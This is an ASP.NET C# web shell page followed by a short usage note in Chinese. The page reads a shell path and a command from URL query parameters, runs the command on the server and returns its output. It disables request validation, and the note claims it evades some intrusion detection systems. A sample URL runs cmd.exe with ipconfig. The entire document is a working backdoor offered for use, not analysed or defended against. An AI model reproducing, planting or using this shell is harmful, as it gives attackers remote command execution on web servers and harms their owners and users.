<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> <%@ import Namespace="System.IO"%> <%@ import Namespace="System.Diagnostics"%> <%@ import Namespace="System.Data"%> <%@ import Namespace="System.Management"%> <%@ import Namespace="System.Data.OleDb"%> <%@ import Namespace="Microsoft.Win32"%> <%@ import Namespace="System.Net.Sockets" %> <%@ import Namespace="System.Net" %> <%@ import Namespace="System.Web.UI"%> <%@ import Namespace="System.Runtime.InteropServices"%> <%@ import Namespace="System.DirectoryServices"%> <%@ import Namespace="System.ServiceProcess"%> <%@ import Namespace="System.Text.RegularExpressions"%> <%@ Import Namespace="System.Threading"%> <%@ Import Namespace="System.Data.SqlClient"%> <%@ import Namespace="Microsoft.VisualBasic"%> <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script runat="server"> protected void Page_load(object sender,EventArgs e) { string ok = Request.QueryString["sb"]; string shell= Request.QueryString["shell"]; //www.moonsec.com moon Response.Write(shell + ok ); Response.Write("<pre>"); Response.Write(GetCmd(ok,shell)); Response.Write("</pre>"); } private string GetCmd(string cmd,string shell) { string ok = string.Empty; Process p = new Process(); p.StartInfo.FileName = shell; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; p.StartInfo.CreateNoWindow = true; string strOutput = null; try { p.Start(); p.StandardInput.WriteLine(cmd); Response.Write(cmd); p.StandardInput.WriteLine("exit"); ok = p.StandardOutput.ReadToEnd(); p.WaitForExit(); p.Close(); } catch (Exception ex) { Response.Write("<pre>"); Response.Write(ex); Response.Write("/<pre>"); } return ok; } </script> </head> <body> </body> </html>
能绕过一些查询ids的。并且有调试信息输出,方便我们查看原因。
用法
https://arvinhk.com/arvin.aspx?shell=C:\WINDOWS\system32\cmd.exe&sb=ipconfig